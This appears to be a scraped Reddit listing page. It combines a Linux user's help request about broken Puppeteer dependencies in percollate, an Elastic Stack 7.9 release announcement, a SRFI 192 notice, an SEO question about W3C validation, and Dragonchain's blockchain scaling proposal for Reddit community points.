- [email protected] node_modules/has-flag
- [email protected] node_modules/http-cache-semantics
- [email protected] node_modules/json-buffer
- [email protected] node_modules/keyv
- [email protected] node_modules/lowercase-keys
- [email protected] node_modules/mimic-fn
- [email protected] node_modules/mimic-response
- [email protected] node_modules/clone-response
- [email protected] node_modules/decompress-response
- [email protected] node_modules/minimist
- [email protected] node_modules/mkdirp
- [email protected] node_modules/normalize-url
- [email protected] node_modules/nunjucks/node_modules/commander
- [email protected] node_modules/onetime
- [email protected] node_modules/os-tmpdir
- [email protected] node_modules/p-cancelable
- [email protected] node_modules/percollate/node_modules/agent-base
- [email protected] node_modules/percollate/node_modules/https-proxy-agent/node_modules/ms
- [email protected] node_modules/percollate/node_modules/https-proxy-agent/node_modules/debug
- [email protected] node_modules/percollate/node_modules/https-proxy-agent
- [email protected] node_modules/percollate/node_modules/ms
- [email protected] node_modules/percollate/node_modules/extract-zip/node_modules/debug
- [email protected] node_modules/percollate/node_modules/rimraf
- [email protected] node_modules/pn
- [email protected] node_modules/prepend-http
- [email protected] node_modules/resolve-url
- [email protected] node_modules/responselike
- [email protected] node_modules/cacheable-request
- [email protected] node_modules/signal-exit
- [email protected] node_modules/restore-cursor
- [email protected] node_modules/cli-cursor
- [email protected] node_modules/source-map-url
- [email protected] node_modules/strip-ansi
- [email protected] node_modules/supports-color
- [email protected] node_modules/chalk
- [email protected] node_modules/log-symbols
- [email protected] node_modules/to-readable-stream
- [email protected] node_modules/typedarray
- [email protected] node_modules/concat-stream
- [email protected] node_modules/percollate/node_modules/extract-zip
- [email protected] node_modules/urix
- [email protected] node_modules/url-parse-lax
- [email protected] node_modules/wcwidth
- [email protected] node_modules/got
- [email protected] node_modules/ora
- [email protected] node_modules/percollate/node_modules/puppeteer
└─┬ percoll[email protected]
├── u/mozilla/readability@0.3.0
├─┬ [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ ├─┬ [email protected]
│ │ │ └─┬ [email protected]
│ │ │ ├── [email protected]
│ │ │ └── string_[email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └── [email protected]
├── UNMET PEER DEPENDENCY [email protected]^2.5.0
├─┬ [email protected]
│ └── [email protected]
├── [email protected]
├─┬ [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ └── [email protected]
│ ├── [email protected]
│ ├── [email protected]
│ ├─┬ [email protected]
│ │ ├── [email protected]
│ │ └── [email protected]
│ └── [email protected]
├── [email protected]
├── [email protected]
├─┬ [email protected]
│ └── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

npm WARN optional SKIPPING OPTIONAL DEPENDENCY: [email protected]~2.1.2 (node_modules/chokidanode_modules/fsevents):
npm WARN notsup SKIPPING OPTIONAL DEPENDENCY: Unsupported platform for [email protected]: wanted {"os":"darwin","arch":"any"} (current: {"os":"linux","arch":"x64"})
npm WARN enoent ENOENT: no such file or directory, open '/home/name/package.json'
npm WARN [email protected] requires a peer of [email protected]^2.5.0 but none was installed.
npm WARN name No description
npm WARN name No repository field.
npm WARN name No README data
npm WARN name No license field.

I have learned that Puppeteer is deprecated [???] and that I should apparently be using something called Playwright. I am befuddled, because Percollate works swimmingly on Elementary OS. I use Elementary on the one device I have because my family and I like the ease of use, but it runs poorly on this other device. As stated previously I despise wkhtmltopdf because it doesn't format websites well at all. I want to be able to download articles and recipes and things to read in the evenings, printed out.

When I run "percollate --version" I get:

Percollate is installed but its dependencies seem to have all broken and / or been abandoned ... on this computer. Is this because Mint Ulyana is Ubuntu 20? Isn't Elementary OS Hera also Ubuntu 20? I'm so lost, I'm relatively new to Linux and still incapable of fixing things like this on my own. I can't write code at all so I wouldn't be able to go about fixing Percollate myself if it truly is broken.

Is there at the very least a way to makewkhtmltopdf format websites nicely without loads of errors?

Sorry for the long post but I wanted to be thorough. Oh yes, I also ran "PUPPETEER_PRODUCT=firefox npm i puppeteer" and that didn't fix anything. This is what happens when I try to run "percollate pdf https://winstonchurchill.org/resources/speeches/1940-the-finest-houwe-shall-fight-on-the-beaches/":

Fetching: https://winstonchurchill.org/resources/speeches/1940-the-finest-houwe-shall-fight-on-the-beaches/
Enhancing web page... ✓
(node:4596) UnhandledPromiseRejectionWarning: Error: Could not find browser revision 782078. Run "PUPPETEER_PRODUCT=firefox npm install" or "PUPPETEER_PRODUCT=firefox yarn install" to download a supported Firefox browser binary.
at ChromeLauncher.launch (/uslocal/lib/node_modules/percollate/node_modules/puppeteelib/cjs/puppeteenode/Launcher.js:86:23)
(node:4596) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)
(node:4596) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.

Does anyone know anything that would help me?
submitted by JonathanWillard to linuxquestions [link] [comments]

2020.08.19 20:16 mstewart04 Elastic Stack 7.9 Released - Highlighted by Free Distribution Tier of features of Workplace Search and Endpoint Security


"We are pleased to announce the general availability of Elastic 7.9. This release brings a broad set of new capabilities to our Elastic Enterprise Search, Observability, and Security solutions, which are built on the Elastic Stack — Elasticsearch, Kibana, Logstash, and Beats. 7.9 delivers significant new capabilities to market, transforming the ways in which our customers and users onboard data into Elastic with the new Elastic Agent, launching a free distribution tier of features of Elastic Workplace Search, part of Elastic Enterprise Search, and, in Elastic Security, introducing the beta of a free distribution tier of endpoint security, featuring malware prevention directly integrated into the Elastic Stack, the first major milestone in delivering comprehensive, integrated endpoint security.
We are also continuing to improve the capabilities of Elastic Cloud, the best place to deploy the Elastic Stack and our solutions. In the last few months, we have launched support for AWS PrivateLink connectivity, achieved FedRAMP Moderate authorization, simplified buying options, and launched support for three new regions. And, of course, Elastic 7.9 is available right now on Elastic Cloud — the only managed Elasticsearch offering to include all of the new features in 7.9. Or you can download the Elastic Stack and our cloud orchestration products, Elastic Cloud Enterprise and Elastic Cloud for Kubernetes, for a self-managed experience.
This is a packed release, and we are excited to share some of the key release highlights below. To get the full feature rundown, dive into the individual solution and product blog posts, but for now, let’s dig in.

Introducing a new free way to get started with Workplace Search, part of Elastic Enterprise Search

Welcoming features of Workplace Search to our free distribution tier

Following the general availability of Workplace Search in 7.7 and its subsequent availability in Elastic Cloud, features of Workplace Search are now available as part of the Basic free distribution tier. Get started on boosting your team’s productivity by unifying all your content platforms like Google Drive, Gmail, Salesforce, SharePoint, Jira, and more into a personalized search experience for your organization. This free tier includes connectors for all supported content sources, access to the custom API for creating your own connectors, group and user management features, and tools for building modern search user experiences.
Workplace Search is available for free, with additional features available with Platinum or Enterprise subscriptions. Workplace Search can be used on Elastic Cloud or can be deployed as a self-managed option on your own infrastructure with the Elastic Stack.

Viewing Elastic Enterprise Search through Kibana

As the window into the Elastic Stack, Kibana allows users to take data from any source, in any format, and search, analyze, and visualize that data in real time. Elastic Enterprise Search is now available in Kibana to provide users with easy navigation to App Search and Workplace Search from a familiar starting point. With this release, Kibana admins can customize spaces to show or hide Elastic Enterprise Search in the main navigation menu. In this release, App Search users can access all their engines and meta engines from Kibana, while Workplace Search users can access user management and content source synchronization tooling.

Supercharging email searching capabilities with Gmail support in Workplace Search

Email is the central hub of business communication, and a huge proportion of our daily insights gets siloed into email archives over time. With 7.9, Workplace Search supports Gmail as a connector. Each individual Gmail user can easily use the clean, intuitive Workplace Search user interface to search within their own email and see results right alongside all their other content sources.
Workplace Search support for Gmail as a connector in Elastic Enterprise Search 7.9

Giving more control and automation over scaling your deployments, plus new insight from source activity logs

Because Elastic Enterprise Search is built on the Elastic Stack, powerful features can be pulled into App Search and Workplace Search based on user needs. In 7.9, App Search and Workplace Search inherit index lifecycle management (ILM) policies from the Elastic Stack. Users can configure ILM policies to automatically manage indexes (engines) according to user requirements. Examples include: creating a new index once it reaches a predefined size; creating or archiving an index each day, week, or month; and deleting indices based on data retention rules. Create and manage ILM policies directly inside App Search.
Get a scoop on all of the new Elastic Enterprise Search features in the Elastic Enterprise Search 7.9 blog.

Delivering a single unified agent with one-click data ingestion

Ingesting data for observability gets a lot simpler with Elastic Agent and Ingest Manager

Onboarding data is a critical — and often time-consuming and tedious — step in observability workflows. How quickly can we go from deciding to monitor a system to actually monitoring the system? How easy is it to instrument the system? Is the collected data parsed and structured to be usable? How quickly can we visualize and glean key insights from the data? Now multiply this by the thousands of components in your technology stack — servers, VMs, containers, applications, databases, middleware, etc. — and the operational aspects become critical.
We are excited to introduce a dramatically simplified data onboarding and ingest management workflow with the launch of several new ingest capabilities in 7.9. Our goal with this initiative is to streamline the entire ingest process so that operators can spend more time acting on insights and less time setting and managing their ingest process. The Elastic Agent, in beta in 7.9, is a single, unified way to collect all kinds of data from a host, including logs, metrics, and endpoint security data, with plans to expand to APM and other data types in the future. Having a single agent to install, configure, update, and maintain is a huge efficiency boost for operators. Ingest Manager, which is also in beta in 7.9, controls all aspects of your ingest universe from a central place. Add and manage integrations for popular services and platforms: we plan to port all 100+ Beats modules over the next few releases. Finally, you can centrally manage all your agents with Fleet — the control tower for all deployed agents. A typical enterprise will usually have agents deployed on tens of thousands of hosts, and Fleet makes it easy for operators to manage this spread from a single place.

Enhancing analyst experience with a unified observability overview page

Unification of the three data pillars of observability — logs, metrics, and traces — at the data layer is one of the features that sets Elastic Observability apart. Having all the data in a single datastore is essential to supporting investigative workflows that seamlessly move between data streams to speed mean time to resolution.
Building on this unified data foundation, we are excited to extend unification to the visualization layer with the launch of a new observability overview page in Kibana. The overview page bubbles up key information across all your observability data — logs, metrics, APM, uptime — and presents a curated at-a-glance view of the health of your entire ecosystem. This out-of-the-box view helps you get to insights faster — especially for new users or new deployments. The overview page includes a newsfeed that keeps you informed of product updates and news.

Embracing open standards with OpenTelemetry integration in Elastic APM

From open code to open community, Elastic is built on openness and transparency. That mindset extends to our support for open standards in the observability space, such as OpenTracing, Jaeger, and W3C Trace-Context. We are happy to add the recently formed OpenTelemetry standard to that list. OpenTelemetry is a Cloud Native Computing Foundation (CNCF) sandbox project, currently in beta, that provides vendor-neutral, language-specific agents, SDKs, and APIs to collect distributed traces, metrics, and log data from monitored applications. We have added the Elastic APM exporter (and contributed it to the OpenTelemetry collector contrib repo), which takes the trace data collected using the OpenTelemetry collector, translates it to Elastic-compatible protocol, and sends it to Elastic APM. This means that you can start exploring your OpenTelemetry using Elastic APM without any changes to your instrumentation. Just add the Elastic exporter, currently in beta, into your OpenTelemetry setup and start exploring your data in minutes.

Strengthening ties between DevOps and SecOps with 50+ turnkey detection rules

While you observe, why not protect? Logs, metrics, and traces from applications and infrastructure collected by observability teams are a rich source of information for security teams. The benefit of having Elastic Security and Elastic Observability sit on top of the same Elasticsearch data is that you can ask different questions of the same data without duplicating it across tools. Elastic caters to the needs of both SecOps and DevOps teams, fostering collaboration. Our unified resource-based pricing means that adding different lenses to the same data doesn’t come at an additional cost.
In 7.9, we are strengthening the bond between Elastic Security and Elastic Observability even more with the beta launch of over 50 turnkey detection rules that allow both DevOps teams and security analysts to benefit from insights for hundreds of services and systems in minutes — with no extra work or cost. And of course, with the flexible detection engine you are welcome to create additional rules to fit your environment.
Dive deeper in all the new features in the Elastic Observability 7.9 blog.

Introducing a free distribution tier of one-click endpoint security, built into Elastic Security

Stopping attacks on your endpoints with integrated malware prevention

We are excited to introduce the first major milestone in delivering comprehensive, integrated endpoint security — free anti-malware capabilities (beta), built directly into Elastic Security, furthering our mission to help secure organizations around the world. Elastic blocks malware from Windows and macOS hosts with signatureless methods recently validated by AV-Comparatives, and detects threats with MITRE ATT&CK®-aligned rules for Windows, macOS, and Linux hosts.

Enhancing your cloud security posture

Our security research team has added prebuilt protections for monitoring cloud infrastructure and identity and access management technologies. These prebuilt machine learning jobs (GA) and threat detection rules (beta) enable customers to detect attacks against cloud infrastructure and applications and are aligned with the ATT&CK Matrix.

Unifying prevention, detection, and response with community-driven workflow enhancements

Elastic Security 7.9 delivers several workflow enhancements that equip analysts to efficiently triage, hunt, investigate, and respond to attacks. New built-in investigation guides help analysts understand which questions to ask when opening a specific type of alert, and customizable timeline templates optimize data presentation to enable faster insights.
An efficient workflow for adding exceptions to detection and endpoint rules helps eliminate overhead associated with minimizing false positives. And a new integration with IBM Resilient streamlines incident response workflows, within the security team and beyond.

Simplifying data ingestion with expanded data integrations

Version 7.9 introduces support for many new host and cloud data sources, including Microsoft Defender ATP, Windows PowerShell, and Google G Suite. These integrations support security operations, DevSecOps, and other common use cases. We are also introducing support for more than 20 common network and application security technologies.
Get all the details in the Elastic Security 7.9 blog.

Introducing instant page loads in Kibana

Delivering instant page loads in Kibana for faster navigation and more natural workflows

For more than 18 months, we've been overhauling the engine at the heart of Kibana. In 7.9, we've completed that work and migrated all of Kibana’s underlying architecture. The immediate benefit is a dramatically faster experience when navigating Kibana. Flipping from APM to Dashboard to Maps to SIEM is now an instantaneous experience that helps keep you in the flow — whether you are supporting mission-critical systems, protecting against security threats, or building data analyses. Beyond this improved user experience, the new architecture also means big improvements for the Kibana development community with the ability to produce features faster, with greater efficiency resulting in higher-quality code.

Simplifying data ingestion with Elastic Agent

Building on the foundation of Beats, lightweight data shippers that help get data into Elasticsearch, we are introducing “one Beat to rule them all,” the new Elastic Agent, which is in beta in 7.9. Instead of installing multiple Beats on a host, users can now install a single Elastic Agent, which brings together the necessary components for metric collection, logging, malware prevention, and more. Better yet, users can centrally manage thousands of agents with a new feature called Fleet. These enhanced capabilities are housed in the new Ingest Manager in Kibana. Whether monitoring cloud infrastructure or configuring thousands of endpoints, we expect these new features to make setup faster and steady state operations easier — and this is only the beginning of our journey.

Enhancing search with a new wildcard data type

Sometimes you only know half of what you’re searching for. Especially in use cases across observability and security, the wildcard operator delivers more powerful searches. Logs often contain lengthy strings without spaces, and consist of standard repeating sections and changing information (e.g., names, duration, IP addresses, etc.). Enter the wildcard data type. To be able to search such strings efficiently, with high performance and low index size, we split them into three letter tokens and apply the same technique to the query. This method allows us to introduce wildcard and regex support in our searches without compromising performance. Designed to dramatically reduce the time it takes to find what you’re searching for when using the wildcard operator, the wildcard data type will be especially useful for security analysts using our Elastic Security solution as they hunt for threats.

Offering a preview of Event Query Language (EQL) in Elasticsearch

At Elastic, we've had requests for many years to introduce a correlation query language to support threat hunting and detection security use cases. When we joined forces with Endgame late last year, we inherited the Event Query Language (EQL), a powerful, battle-tested language designed for this purpose. It has been running efficiently on endpoints blocking threats in Endgame solutions for years. In 7.9, we're excited to release our first public preview of EQL, a first-class query language in Elasticsearch, as an experimental feature. We're releasing it today as an API in Elasticsearch, and we have plans to incorporate a robust UI for EQL in Elastic Security and Kibana in the future. We'd love your feedback and your creativity — EQL was designed for security, but we expect it will open many new ways to use Elasticsearch.
Read about these features and more in the Kibana 7.9 blog and the Elasticsearch 7.9 blog.

Enhancing security on Elastic Cloud with support for AWS PrivateLink

Enhancing security and compliance with AWS PrivateLink support, IP filtering, support for Google credentials, and FedRAMP authorization

We have also launched support for AWS PrivateLink, which provides private network connectivity between your AWS virtual private clouds (VPCs) and Elastic Cloud. We have also launched support for IP filtering across public cloud providers, enabling you to specify network access to your Elastic Cloud deployment based on IP addresses, address blocks, or ranges. We have also added support for Google Accounts, so that you can sign up for Elastic Cloud using your existing Google Account credentials. With a couple of clicks, you can use your Google identity to access your Elastic Cloud account instead of maintaining separate credentials.
Configure a traffic filter: PrivateLink endpoint on Elastic Cloud
In addition, the Elastic Cloud AWS GovCloud US East region is designated authorized for FedRAMP Moderate. Federal, state, and local government users, as well as higher education institutions and users with government data, can start a free trial today!

Supporting more flexible buying options with self-service monthly premium subscriptions and new regions

You can now purchase Gold and Platinum monthly subscriptions directly within the Elastic Cloud console. With just a few clicks, you’ll get access to support SLAs and the exclusive capabilities of the Elastic Stack, including our solutions for enterprise search, observability, and security. We’ve also added more regions across multiple cloud service providers, so you can access Elastic Cloud in more locations, including Canada Central, Paris, and Seoul. Our AWS GovCloud region is also now generally available.

Improving service performance with in-place configuration changes and new AWS instance types

In-place configuration changes allow for faster and more reliable configuration updates. Their speed and reliability come from applying changes to the cluster (like settings, upgrades, and resizing) in place, which is followed by a rolling restart of nodes — avoiding potentially long-running data migration operations. We have also launched support for Amazon EC2 M5d general purpose and R5d memory-optimized instances in all supported AWS regions on Elastic Cloud. M5d instances provide a balance of compute, memory, and networking resources, while R5d instances are designed to deliver fast performance when processing large data sets in memory.

Supporting new self-managed capabilities with Elastic Cloud Enterprise 2.6 and Elastic Cloud on Kubernetes 1.2

We are pleased to announce the general availability of Elastic Cloud Enterprise 2.6. Elastic Cloud Enterprise lets customers centrally orchestrate a fleet of Elasticsearch clusters using the same capabilities that Elastic uses to run Elastic Cloud. With the 2.6 release, Elastic Cloud Enterprise adds support for the Elastic Cloud Control (ecctl) CLI, management of the new unified Elastic Enterprise Search including support for our new Workplace Search capabilities, and in-place configuration changes.
We are also pleased to announce the general availability of Elastic Cloud on Kubernetes 1.2. Elastic Cloud on Kubernetes simplifies setup, upgrades, snapshots, scaling, high availability, security, and more for running Elasticsearch and Kibana in Kubernetes. The new 1.2 version lets you easily deploy and orchestrate Elastic Enterprise Search, allowing you to launch an instance of App Search or Workplace Search and connect it to an Elasticsearch cluster with just a few lines of YAML configuration. The new 1.2 version also lets you take advantage of the new Beats Custom Resource Definition (CRD) to deploy and manage data shippers such as Filebeat, Metricbeat, Auditbeat, and others using ECK.
To get caught up on all of the Elastic Cloud news, check out the What’s New In Elastic Cloud blog.

There’s always more...

So much more. Check out the individual solution and product blog posts for the details on everything we added in 7.9:

Elastic Solutions

Elastic Stack

Elastic Cloud

submitted by mstewart04 to elasticsearch [link] [comments]

2020.08.01 07:18 arthurgleckler Final SRFI 192: Port Positioning

Scheme Request for Implementation 192, "Port Positioning," by The R6RS editors; John Cowan (shepherd); Shiro Kawai (implementation; requires a hook), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-192/.
Here's the abstract:
This is an extract from the R6RS that documents its support for positioning ports. Binary ports can be positioned to read or write at a specific byte; textual ports at a specific character, although character positions can't be synthesized portably. It has been lightly edited to fit R7RS style.
Here is the commit summary since the most recent draft:
Here are the diffs since the most recent draft:
Many thanks to The and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.07.31 08:30 quantseeker Does W3C validation help in getting ranked higher?

The digital marketing agency i have hired for SEO is telling me that my website is missing W3C validation and this needs to be fixed asap and it’s blocking their SEO efforts.
Does it impact SEO and how urgent is this really?
submitted by quantseeker to SEO [link] [comments]

2020.07.29 16:56 j0j0r0 Dragonchain Great Reddit Scaling Bake-Off Public Proposal

Dragonchain Great Reddit Scaling Bake-Off Public Proposal

Dragonchain Public Proposal TL;DR:

Dragonchain has demonstrated twice Reddit’s entire total daily volume (votes, comments, and posts per Reddit 2019 Year in Review) in a 24-hour demo on an operational network. Every single transaction on Dragonchain is decentralized immediately through 5 levels of Dragon Net, and then secured with combined proof on Bitcoin, Ethereum, Ethereum Classic, and Binance Chain, via Interchain. At the time, in January 2020, the entire cost of the demo was approximately $25K on a single system (transaction fees locked at $0.0001/txn). With current fees (lowest fee $0.0000025/txn), this would cost as little as $625.
Watch Joe walk through the entire proposal and answer questions on YouTube.
This proposal is also available on the Dragonchain blog.

Hello Reddit and Ethereum community!

I’m Joe Roets, Founder & CEO of Dragonchain. When the team and I first heard about The Great Reddit Scaling Bake-Off we were intrigued. We believe we have the solutions Reddit seeks for its community points system and we have them at scale.
For your consideration, we have submitted our proposal below. The team at Dragonchain and I welcome and look forward to your technical questions, philosophical feedback, and fair criticism, to build a scaling solution for Reddit that will empower its users. Because our architecture is unlike other blockchain platforms out there today, we expect to receive many questions while people try to grasp our project. I will answer all questions here in this thread on Reddit, and I've answered some questions in the stream on YouTube.
We have seen good discussions so far in the competition. We hope that Reddit’s scaling solution will emerge from The Great Reddit Scaling Bake-Off and that Reddit will have great success with the implementation.

Executive summary

Dragonchain is a robust open source hybrid blockchain platform that has proven to withstand the passing of time since our inception in 2014. We have continued to evolve to harness the scalability of private nodes, yet take full advantage of the security of public decentralized networks, like Ethereum. We have a live, operational, and fully functional Interchain network integrating Bitcoin, Ethereum, Ethereum Classic, and ~700 independent Dragonchain nodes. Every transaction is secured to Ethereum, Bitcoin, and Ethereum Classic. Transactions are immediately usable on chain, and the first decentralization is seen within 20 seconds on Dragon Net. Security increases further to public networks ETH, BTC, and ETC within 10 minutes to 2 hours. Smart contracts can be written in any executable language, offering full freedom to existing developers. We invite any developer to watch the demo, play with our SDK’s, review open source code, and to help us move forward. Dragonchain specializes in scalable loyalty & rewards solutions and has built a decentralized social network on chain, with very affordable transaction costs. This experience can be combined with the insights Reddit and the Ethereum community have gained in the past couple of months to roll out the solution at a rapid pace.

Response and PoC

In The Great Reddit Scaling Bake-Off post, Reddit has asked for a series of demonstrations, requirements, and other considerations. In this section, we will attempt to answer all of these requests.

Live Demo

A live proof of concept showing hundreds of thousands of transactions
On Jan 7, 2020, Dragonchain hosted a 24-hour live demonstration during which a quarter of a billion (250 million+) transactions executed fully on an operational network. Every single transaction on Dragonchain is decentralized immediately through 5 levels of Dragon Net, and then secured with combined proof on Bitcoin, Ethereum, Ethereum Classic, and Binance Chain, via Interchain. This means that every single transaction is secured by, and traceable to these networks. An attack on this system would require a simultaneous attack on all of the Interchained networks.
24 hours in 4 minutes (YouTube):
24 hours in 4 minutes
The demonstration was of a single business system, and any user is able to scale this further, by running multiple systems simultaneously. Our goals for the event were to demonstrate a consistent capacity greater than that of Visa over an extended time period.
Tooling to reproduce our demo is available here:

Source Code

Source code (for on & off-chain components as well tooling used for the PoC). The source code does not have to be shared publicly, but if Reddit decides to use a particular solution it will need to be shared with Reddit at some point.


How it works & scales

Architectural Scaling

Dragonchain’s architecture attacks the scalability issue from multiple angles. Dragonchain is a hybrid blockchain platform, wherein every transaction is protected on a business node to the requirements of that business or purpose. A business node may be held completely private or may be exposed or replicated to any level of exposure desired.
Every node has its own blockchain and is independently scalable. Dragonchain established Context Based Verification as its consensus model. Every transaction is immediately usable on a trust basis, and in time is provable to an increasing level of decentralized consensus. A transaction will have a level of decentralization to independently owned and deployed Dragonchain nodes (~700 nodes) within seconds, and full decentralization to BTC and ETH within minutes or hours. Level 5 nodes (Interchain nodes) function to secure all transactions to public or otherwise external chains such as Bitcoin and Ethereum. These nodes scale the system by aggregating multiple blocks into a single Interchain transaction on a cadence. This timing is configurable based upon average fees for each respective chain. For detailed information about Dragonchain’s architecture, and Context Based Verification, please refer to the Dragonchain Architecture Document.

Economic Scaling

An interesting feature of Dragonchain’s network consensus is its economics and scarcity model. Since Dragon Net nodes (L2-L4) are independent staking nodes, deployment to cloud platforms would allow any of these nodes to scale to take on a large percentage of the verification work. This is great for scalability, but not good for the economy, because there is no scarcity, and pricing would develop a downward spiral and result in fewer verification nodes. For this reason, Dragonchain uses TIME as scarcity.
TIME is calculated as the number of Dragons held, multiplied by the number of days held. TIME influences the user’s access to features within the Dragonchain ecosystem. It takes into account both the Dragon balance and length of time each Dragon is held. TIME is staked by users against every verification node and dictates how much of the transaction fees are awarded to each participating node for every block.
TIME also dictates the transaction fee itself for the business node. TIME is staked against a business node to set a deterministic transaction fee level (see transaction fee table below in Cost section). This is very interesting in a discussion about scaling because it guarantees independence for business implementation. No matter how much traffic appears on the entire network, a business is guaranteed to not see an increased transaction fee rate.

Scaled Deployment

Dragonchain uses Docker and Kubernetes to allow the use of best practices traditional system scaling. Dragonchain offers managed nodes with an easy to use web based console interface. The user may also deploy a Dragonchain node within their own datacenter or favorite cloud platform. Users have deployed Dragonchain nodes on-prem on Amazon AWS, Google Cloud, MS Azure, and other hosting platforms around the world. Any executable code, anything you can write, can be written into a smart contract. This flexibility is what allows us to say that developers with no blockchain experience can use any code language to access the benefits of blockchain. Customers have used NodeJS, Python, Java, and even BASH shell script to write smart contracts on Dragonchain.
With Docker containers, we achieve better separation of concerns, faster deployment, higher reliability, and lower response times.
We chose Kubernetes for its self-healing features, ability to run multiple services on one server, and its large and thriving development community. It is resilient, scalable, and automated. OpenFaaS allows us to package smart contracts as Docker images for easy deployment.
Contract deployment time is now bounded only by the size of the Docker image being deployed but remains fast even for reasonably large images. We also take advantage of Docker’s flexibility and its ability to support any language that can run on x86 architecture. Any image, public or private, can be run as a smart contract using Dragonchain.

Flexibility in Scaling

Dragonchain’s architecture considers interoperability and integration as key features. From inception, we had a goal to increase adoption via integration with real business use cases and traditional systems.
We envision the ability for Reddit, in the future, to be able to integrate alternate content storage platforms or other financial services along with the token.
  • LBRY - To allow users to deploy content natively to LBRY
  • MakerDAO to allow users to lend small amounts backed by their Reddit community points.
  • STORJ/SIA to allow decentralized on chain storage of portions of content. These integrations or any other are relatively easy to integrate on Dragonchain with an Interchain implementation.


Cost estimates (on-chain and off-chain) For the purpose of this proposal, we assume that all transactions are on chain (posts, replies, and votes).
On the Dragonchain network, transaction costs are deterministic/predictable. By staking TIME on the business node (as described above) Reddit can reduce transaction costs to as low as $0.0000025 per transaction.
Dragonchain Fees Table

Getting Started

How to run it
Building on Dragonchain is simple and requires no blockchain experience. Spin up a business node (L1) in our managed environment (AWS), run it in your own cloud environment, or on-prem in your own datacenter. Clear documentation will walk you through the steps of spinning up your first Dragonchain Level 1 Business node.
Getting started is easy...
  1. Download Dragonchain’s dctl
  2. Input three commands into a terminal
  3. Build an image
  4. Run it
More information can be found in our Get started documents.

Dragonchain is an open source hybrid platform. Through Dragon Net, each chain combines the power of a public blockchain (like Ethereum) with the privacy of a private blockchain.
Dragonchain organizes its network into five separate levels. A Level 1, or business node, is a totally private blockchain only accessible through the use of public/private keypairs. All business logic, including smart contracts, can be executed on this node directly and added to the chain.
After creating a block, the Level 1 business node broadcasts a version stripped of sensitive private data to Dragon Net. Three Level 2 Validating nodes validate the transaction based on guidelines determined from the business. A Level 3 Diversity node checks that the level 2 nodes are from a diverse array of locations. A Level 4 Notary node, hosted by a KYC partner, then signs the validation record received from the Level 3 node. The transaction hash is ledgered to the Level 5 public chain to take advantage of the hash power of massive public networks.
Dragon Net can be thought of as a “blockchain of blockchains”, where every level is a complete private blockchain. Because an L1 can send to multiple nodes on a single level, proof of existence is distributed among many places in the network. Eventually, proof of existence reaches level 5 and is published on a public network.

API Documentation

APIs (on chain & off)

SDK Source

Nobody’s Perfect

Known issues or tradeoffs
  • Dragonchain is open source and even though the platform is easy enough for developers to code in any language they are comfortable with, we do not have so large a developer community as Ethereum. We would like to see the Ethereum developer community (and any other communities) become familiar with our SDK’s, our solutions, and our platform, to unlock the full potential of our Ethereum Interchain. Long ago we decided to prioritize both Bitcoin and Ethereum Interchains. We envision an ecosystem that encompasses different projects to give developers the ability to take full advantage of all the opportunities blockchain offers to create decentralized solutions not only for Reddit but for all of our current platforms and systems. We believe that together we will take the adoption of blockchain further. We currently have additional Interchain with Ethereum Classic. We look forward to Interchain with other blockchains in the future. We invite all blockchains projects who believe in decentralization and security to Interchain with Dragonchain.
  • While we only have 700 nodes compared to 8,000 Ethereum and 10,000 Bitcoin nodes. We harness those 18,000 nodes to scale to extremely high levels of security. See Dragonchain metrics.
  • Some may consider the centralization of Dragonchain’s business nodes as an issue at first glance, however, the model is by design to protect business data. We do not consider this a drawback as these nodes can make any, none, or all data public. Depending upon the implementation, every subreddit could have control of its own business node, for potential business and enterprise offerings, bringing new alternative revenue streams to Reddit.

Costs and resources

Summary of cost & resource information for both on-chain & off-chain components used in the PoC, as well as cost & resource estimates for further scaling. If your PoC is not on mainnet, make note of any mainnet caveats (such as congestion issues).
Every transaction on the PoC system had a transaction fee of $0.0001 (one-hundredth of a cent USD). At 256MM transactions, the demo cost $25,600. With current operational fees, the same demonstration would cost $640 USD.
For the demonstration, to achieve throughput to mimic a worldwide payments network, we modeled several clients in AWS and 4-5 business nodes to handle the traffic. The business nodes were tuned to handle higher throughput by adjusting memory and machine footprint on AWS. This flexibility is valuable to implementing a system such as envisioned by Reddit. Given that Reddit’s daily traffic (posts, replies, and votes) is less than half that of our demo, we would expect that the entire Reddit system could be handled on 2-5 business nodes using right-sized containers on AWS or similar environments.
Verification was accomplished on the operational Dragon Net network with over 700 independently owned verification nodes running around the world at no cost to the business other than paid transaction fees.



This PoC should scale to the numbers below with minimal costs (both on & off-chain). There should also be a clear path to supporting hundreds of millions of users.
Over a 5 day period, your scaling PoC should be able to handle:
*100,000 point claims (minting & distributing points) *25,000 subscriptions *75,000 one-off points burning *100,000 transfers
During Dragonchain’s 24 hour demo, the above required numbers were reached within the first few minutes.
Reddit’s total activity is 9000% more than Ethereum’s total transaction level. Even if you do not include votes, it is still 700% more than Ethereum’s current volume. Dragonchain has demonstrated that it can handle 250 million transactions a day, and it’s architecture allows for multiple systems to work at that level simultaneously. In our PoC, we demonstrate double the full capacity of Reddit, and every transaction was proven all the way to Bitcoin and Ethereum.
Reddit Scaling on Ethereum


Solutions should not depend on any single third-party provider. We prefer solutions that do not depend on specific entities such as Reddit or another provider, and solutions with no single point of control or failure in off-chain components but recognize there are numerous trade-offs to consider
